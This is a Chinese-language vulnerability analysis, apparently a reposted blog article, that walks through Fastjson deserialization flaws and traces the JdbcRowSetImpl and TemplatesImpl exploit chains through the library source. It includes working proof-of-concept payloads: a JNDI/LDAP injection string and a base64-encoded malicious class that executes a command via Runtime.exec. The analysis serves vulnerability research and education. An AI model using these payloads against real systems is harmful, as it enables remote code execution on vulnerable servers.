Fastjson反序列化漏洞深度分析

admin

109443
文章

90
评论

2024年7月3日14:43:15评论7 views字数 10195阅读33分59秒阅读模式

概述

Fastjson是阿里巴巴的⼀个开源Java库，提供了Java对象与Json相互转换的API

toJSONString()方法：将Json对象转换成Json字符串；
parseObject()方法：将Json字符串转换成Json对象；
pase()方法：将Json字符串转换为Json对象

本文主要分析一下当我们打了payload之后具体是怎么触发反序列化的，为什么可以执行命令

Fastjson反序列化

定义⼀个person类

package org.example;public class Person {        private String name;    private int age;    public Person(){        System.out.println("constructor run");    }    public void setName(String name) {        System.out.println("setName run");        this.name = name;    }    public String getName() {        System.out.println("getnNme run");        return this.name;    }    public void setAge(int age) {        System.out.println("setAge run");        this.age = age;    }    public int getAge(){        System.out.println("getAge run");        return this.age;    }}

再定义⼀个Testperson类

package org.example;import com.alibaba.fastjson.JSON;public class Testperson {    public static void main(String[] args) {        Person person = new Person();        person.setAge(18);        person.setName("zhangsan");        System.out.println("----------------------------------------------");        //序列化        String jsonString1 = JSON.toJSONString(person);     // String jsonString1 = JSON.toJSONString(person, SerializerFeature.WriteClassName);        System.out.println(jsonString1);     // String jsonString1 = "{"age":18,"name":"zhangsan"}";     // String jsonString1 = "{"@type":"Person","age":18,"name":"zhangsan"}";        //反序列化        Object person1 = JSON.parse(jsonString1);        System.out.println(person1);    }}

运行结果

constructor runsetAge runsetName run----------------------------------------------getAge rungetnNme run{"@type":"Person","age":18,"name":"zhangsan"}constructor runsetAge runsetName runPerson@3d71d552

结论：

在序列化的时候，Fastjson会调用指定类中的get方法，被private修饰且没有get方法的属性不会被序列化，
在反序列化的时候，fastjson会调用指定属性的set方法，并且public修饰的属性全部会被赋值

Fastjson反序列化漏洞复现

漏洞是利用fastjson在使用autotype处理json对象的时候，未对@type字段进行完全的安全性验证，导致攻击者可以传入危险类，并调用危险方法连接远程rmi主机，通过其中的恶意类执行代码。

JdbcRowSetImpl链分析

JdbcRowSetImpl的利⽤链在实际运用中较为广泛，这个链基本没啥限制条件，只需要Json.parse(input) 即可进行命令执行。但是使用JNDI注入对JDK的版本有⼀定限制

RMI利用的JDK版本≤ JDK 6u132、7u122、8u113

LADP利用JDK版本≤ 6u211 、7u201、8u191

漏洞复现

漏洞版本：fastjson 1.22-1.24
利用链：JdbcRowSetImpl
poc：

import com.alibaba.fastjson.JSON;public class JdbcRowSetImplPoc {    public static void main(String[] args) {        String PoC = "{"@type":"com.sun.rowset.JdbcRowSetImpl", "dataSourceName":"ldap://127.0.0.1:8085/MPfKfjem", "autoCommit":true}";                  JSON.parse(PoC);    }}

从前面的测试中我们可以知道，FastJson反序列化的过程中会调用指定属性的get、set方法。

@type：目标反序列化类名；
dataSourceName：JNDI远程恶意服务，反序列化时会调用setDataSourceName方法；
autoCommit：在反序列化时，会去调用setAutoCommit方法

调试中我们可以看到dataSourceName参数在解析中会调用setDataSourceName方法赋值

Fastjson反序列化漏洞深度分析

而autoCommit参数也会调用setAutoCommit方法

Fastjson反序列化漏洞深度分析

这里会执行到else这个分支，然后调用this.connect()方法，跟进该方法

Fastjson反序列化漏洞深度分析

跟踪到这里发现执行了lookup方法，而lookup方法传入了this.getDataSourceName()参数，这个参数返回的是dataSourceName的值，而这个dataSourceName是前面setDataSourceName方法设置的，是⼀个可控的参数，所以这里可以使用JNDI注入从而达到命令执行

Templateslmpl链分析

漏洞复现

漏洞版本：fastjson 1.22-1.24
利用链：TemplatesImpl
poc：

import com.alibaba.fastjson.JSON;import com.alibaba.fastjson.parser.Feature;import com.alibaba.fastjson.parser.ParserConfig;public class TemplatesImplPoc {    public static void main(String[] args) {        ParserConfig config = new ParserConfig();        String text = "{"@type":"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl","_bytecodes":["yv66vgAAADQAJgoABwAXCgAYABkIABoKABgAGwcAHAoABQAXBwAdAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEACkV4Y2VwdGlvbnMHAB4BAAl0cmFuc2Zvcm0BAKYoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWAQByKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO1tMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWBwAfAQAEbWFpbgEAFihbTGphdmEvbGFuZy9TdHJpbmc7KVYHACABAApTb3VyY2VGaWxlAQAJVGVzdC5qYXZhDAAIAAkHACEMACIAIwEABGNhbGMMACQAJQEABFRlc3QBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQATamF2YS9pby9JT0V4Y2VwdGlvbgEAOWNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9UcmFuc2xldEV4Y2VwdGlvbgEAE2phdmEvbGFuZy9FeGNlcHRpb24BABFqYXZhL2xhbmcvUnVudGltZQEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsBAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7ACEABQAHAAAAAAAEAAEACAAJAAIACgAAAC4AAgABAAAADiq3AAG4AAISA7YABFexAAAAAQALAAAADgADAAAACgAEAAsADQAMAAwAAAAEAAEADQABAA4ADwABAAoAAAAZAAAABAAAAAGxAAAAAQALAAAABgABAAAAEAABAA4AEAACAAoAAAAZAAAAAwAAAAGxAAAAAQALAAAABgABAAAAFQAMAAAABAABABEACQASABMAAgAKAAAAJQACAAIAAAAJuwAFWbcABkyxAAAAAQALAAAACgACAAAAGAAIABkADAAAAAQAAQAUAAEAFQAAAAIAFg=="],'_name':'a.b','_tfactory':{ },"_outputProperties":{ }}";        Object obj = JSON.parseObject(text, Object.class, config, Feature.SupportNonPublicField);    }}

Fastjson反序列化漏洞深度分析

其中_bytecodes字段对应的数据的是下面这段代码，编译后进行base64加密后的数据

import com.sun.org.apache.xalan.internal.xsltc.DOM;import com.sun.org.apache.xalan.internal.xsltc.TransletException;import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;import com.sun.org.apache.xml.internal.serializer.SerializationHandler;import java.io.IOException;public class Test extends AbstractTranslet {    public Test() throws IOException {        Runtime.getRuntime().exec("calc");    }    @Override    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) {    }    @Override    public void transform(DOM document, com.sun.org.apache.xml.internal.serializer.SerializationHandler[] handlers) throws TransletException {    }    public static void main(String[] args) throws Exception {        Test t = new Test();    }}

思考：

1. 如果是只对_bytecodes插⼊恶意代码为什么需要构造这么多的值

2. _bytecodes中的值为什么需要进行Base64加密

3. 在反序列化的时候为什么要加入Feature.SupportNonPublicField参数值

从源码可以看到"_name、 _tractory、 _outputProperties、 _bytecodes"这几个参数都是private修饰的私有变量，并且_name、_tractory、_bytecodes参数没有对应的set方法，必须加入Feature.SupportNonPublicField属性在parseObject中才能触发。由此可以看出TemplatesImpl链的利用条件比较苛刻，需要开启Feature.SupportNonPublicField选项才能利用

Fastjson反序列化漏洞深度分析

@type：用于存放反序列化时的目标类型，这里指定的是TemplatesImpl这个类，Fastjson会按照这个类反序列化得到实例，因为调用了getOutputProperties方法，实例化了传入的bytecodes类，导致命令执行
_bytecodes：继承AbstractTranslet类的恶意类字节码，并且使用Base64编码
_name：调用getTransletInstance时会判断其是否为null，为null直接return，不会往下进行执行，利用链就断了

Fastjson反序列化漏洞深度分析

_tfactory：defineTransletClasses中会调用其getExternalExtensionsMap方法，为null会出现异常

Fastjson反序列化漏洞深度分析

_outputProperties：漏洞利用时的关键参数，由于Fastjson反序列化过程中会调用其getOutputProperties方法，导致bytecodes字节码成功实例化，造成命令执行

Fastjson反序列化漏洞深度分析

漏洞断点分析

下断点开始调试

public static <T> T parseObject(String input, Type clazz, ParserConfig config, Feature... features) {        return parseObject(input, clazz, config, (ParseProcess)null, DEFAULT_PARSER_FEATURE, features);    }

这里传入了几个参数，并调用重载的parseObject方法。

input：json字符串
clazz：指定反序列化对象，这里是class
config：ParserConfig的实例对象
Feature：反序列化private属性所用到的⼀个参数

Fastjson反序列化漏洞深度分析

实例化了⼀个DefaultJSONParser（json解析器），然后调用parseObject方法，跟踪parseObject。

Fastjson反序列化漏洞深度分析

parseObject方法：

Fastjson反序列化漏洞深度分析

这里调用了deserialze方法，进行跟踪

Fastjson反序列化漏洞深度分析

这里首先判断是不是GenericArrayType类型，然后是⼀个三元判断type是否为Class对象并且type不等于Object.class，type不等于Serializable.class，条件为true调用parser.parseObject，条件为flase调用parser.parse。很显然这里会调用parser.parse方法。继续跟踪

parse方法：

Fastjson反序列化漏洞深度分析

这里将this.lexer赋值给lexer，这个this.lexer是在调用重载parseObject方法时，在实例化DefaultJSONParser对象的时候赋值的

Fastjson反序列化漏洞深度分析

这里获取当前字符串的第⼀个字符，如果第⼀个字符为"{"的话，token=12

Fastjson反序列化漏洞深度分析

然后是⼀个switch语句，根据token的值，调用重载的parseObject方法。

Fastjson反序列化漏洞深度分析

parseObject方法：这里就开始对json字符串进行解析了

这里先跳过空格和多个逗号（,），然后当ch == '"'时，通过lexer.scanSymbol方法获取key的值，也就是@type

Fastjson反序列化漏洞深度分析

然后判断key是否等于"@type"，如果为真则获取key的值，也就是我们写的类名,接着调用TypeUtils.loadClass方法，通过反射将类名传进去获取⼀个类对象

跟进loadclass方法，看⼀下类是怎么加载的，先是在mappings缓存里找这个类，然后又判断类名是否以[开头，true的话就去掉，接着判断是否以L开头;结尾，true的话也是去掉这些，这里也为fastjson后续版本的绕过埋下了伏笔（1.2.41、1.2.42、1.2.43）

Fastjson反序列化漏洞深度分析

如果上面的情况都不满足的话，在这里获取⼀个类加载器，加载类之后放到mappings缓存里面，并返回这个类，这里也是为后续版本的绕过埋下了伏笔

Fastjson反序列化漏洞深度分析

然后走到这里，调用this.config.getDeserializer(clazz)方法获取反序列化器

ObjectDeserializer deserializer = config.getDeserializer(clazz);return deserializer.deserialze(this, clazz, fieldName);

跟进getDeserializer方法，首先在缓存里获取反序列化器

这里可以看到它的构造方法里内置了⼀些反序列化器

Fastjson反序列化漏洞深度分析

再次调用重载的getDeserializer方法，首先还是在缓存中查找反序列化的类，最后调用this.createJavaBeanDeserializer(clazz, (Type)type)方法

Fastjson反序列化漏洞深度分析

跟进createJavaBeanDeserializer方法：

这里有⼀个asmEnable的属性，默认为true，他类似⼀个开关，用来控制是否启用ASM（ASM是⼀个用于操作Java字节码的框架。它是⼀个轻量级且高性能的字节码工具库，广泛用于在运行时生成和转换Java类的字节码）

下面的很多判断都是来改变这个asmEnable

最后调用了JavaBeanInfo.build(clazz, type, this.propertyNamingStrategy)方法

Fastjson反序列化漏洞深度分析

跟进：这里先获取类的⼀些信息

(JSONType)clazz.getAnnotation(JSONType.class)：获取JSONTye注解
getBuilderClass(jsonType) :通过JSONType注解获取类构造器
clazz.getDeclaredFields()：获取类中所有的属性
clazz.getMethods()：获取类中的⽅法
getDefaultConstructor(builderClass == null ? clazz : builderClass)：获取默认构造方法
ListfieldList = new ArrayList()：新建⼀个数组对象，⽤来存储所有符合要求字段

Fastjson反序列化漏洞深度分析

然后这里有3个for循环，分别用来获取set方法，public字段，get方法，然后将符合要求的字段添加到fieldList数组

Fastjson反序列化漏洞深度分析

set方法的查找方式：

方法名长度大于4
非静态方法
返回值为void或当前类
方法名以set开头
参数个数为1

Fastjson反序列化漏洞深度分析

get方法的查找方式：

方法名长度大于等于4
非静态方法
以get开头且第4个字母为大写
无传入参数
返回值类型继承自Collection Map AtomicBoolean AtomicInteger AtomicLong

Fastjson反序列化漏洞深度分析

最后我们获取到了TemplatesImpl的getOutputProperties()方法

Fastjson反序列化漏洞深度分析

然后返回到com.alibaba.fastjson.parser.deserializer.JavaBeanDeserializer#deserialze接着跟踪

Fastjson反序列化漏洞深度分析

经过重载后来到这里，开始遍历json中的内容

Fastjson反序列化漏洞深度分析

然后直接来到这里，调用this.parseField(parser, key, object, type, fieldValues)方法

Fastjson反序列化漏洞深度分析

跟进，这里调用this.smartMatch(key)方法获取字段对应的反序列化器（set、get方法）

然后有这样两行代码：

int mask = Feature.SupportNonPublicField.mask;if (fieldDeserializer == null && (parser.lexer.isEnabled(mask) || (this.beanInfo.parserFeatures & mask) != 0)) {

由于调用parseObject方法反序列化时，设置了Feature.SupportNonPublicField属性，这里经过判断后会进去到这个if分支里，如果未设置Feature.SupportNonPublicField属性，则会返回false

Object obj = JSON.parseObject(text, Object.class, config, Feature.SupportNonPublicField);

Fastjson反序列化漏洞深度分析

这里的if循环，主要就是遍历类中的所有字段，把修饰符不是final和static的字段放入这个extraFieldDeserializers反序列化器内

Fastjson反序列化漏洞深度分析

然后通过this.extraFieldDeserializers.get(key) --- 获取字段的反序列化器

通过field.setAccessible(true)方法设置私有字段可访问（private修饰的字段，在使用反射时不能直接访问）

再调用重载的((FieldDeserializer)fieldDeserializer).parseField()方法

跟进parseField()方法

1.通过this.getFieldValueDeserilizer(parser.getConfig())方法获取字段值的反序列化器

2.通过this.setValue(object, value)方法给字段赋值

Fastjson反序列化漏洞深度分析

跟进this.setValue()方法，这里有两个逻辑

1. 这里首先获取字段对应的set方法，通过method.invaka()方法进行赋值

2. 如果字段没有对应的set方法，method为null，然后获取字段，并通过field.set()方法对字段进行赋值

TemplatesImpl类内的调用链

通过invaka()方法会调用到getOutputProperties()方法

Fastjson反序列化漏洞深度分析

跟进newTransformer方法

Fastjson反序列化漏洞深度分析

这里调用了getTransletInstance方法

这里首先判断"_name"参数是否为空，为空返回null

然后调用defineTransletClasses方法

Fastjson反序列化漏洞深度分析

跟进defineTransletClasses

1.判断_bytecodes数组是否为空

2.创建⼀个TransletClassLoader对象loader

3.使用循环遍历_bytecodes数组，将每个字节码通过loader.defineClass方法加载为Class对象，并将其存储在_class数组中

Fastjson反序列化漏洞深度分析

然后回到getTransletInstance方法，这里使用AbstractTranslet translet =(AbstractTranslet)_class[_transletIndex].newInstance()创建⼀个新的AbstractTranslet对象，到这⾥恶意代码被加载

调用栈

Fastjson反序列化漏洞深度分析

tips

至于为什么是getOutputProperties()方法，而不是get_OutputProperties，因为在执行smartMatch()方法获取字段反序列化器的时候，如果匹配不到get_OutputPropertie，会把（_）和（-）替换为空继续进行匹配

Fastjson反序列化漏洞深度分析

还有最后⼀个问题：_bytecodes为什么需要进行base64编码的问题让我们回到parseField方法，在获取value值的时候调用了deserialze方法

Fastjson反序列化漏洞深度分析

跟踪deserialze方法，这里又调用了parser.parseArray方法

跟踪parser.parseArray，然后又调用了deserialze方法

Fastjson反序列化漏洞深度分析

跟进后发现，看到这里调用了lexer.bytesValue()方法

跟进lexer.bytesValue()方法，发现这里进行了base64解码

Fastjson反序列化漏洞深度分析

交流群

Fastjson反序列化漏洞深度分析

原文始发于微信公众号（起凡安全）：Fastjson反序列化漏洞深度分析

左青龙
微信扫一扫

右白虎
微信扫一扫

Fastjson反序列化漏洞深度分析

JFinalCMS 系统的漏洞浅析。“这套系统搭建方便简单，代码分析不难，非常适合刚入门的朋友学习。”

dotnet中的Path Traversal

【JAVA安全】Java反序列化CommonsCollections-CC1链及JAVA审计学习路线

Shiro有key但无回显利用链子-JRMP大法

PHP变量覆盖漏洞学习笔记

记一次java协同办公OA系统源码审计

源码分析致远A8任意文件读取漏洞，附数据库密码解密脚本

某开源电商系统代码审计

信呼OA后台GETSHELL分析

干货 | JAVA内存马研究0到1（3万字总结，建议收藏）开放文库更新！

发表评论

在线咨询

微信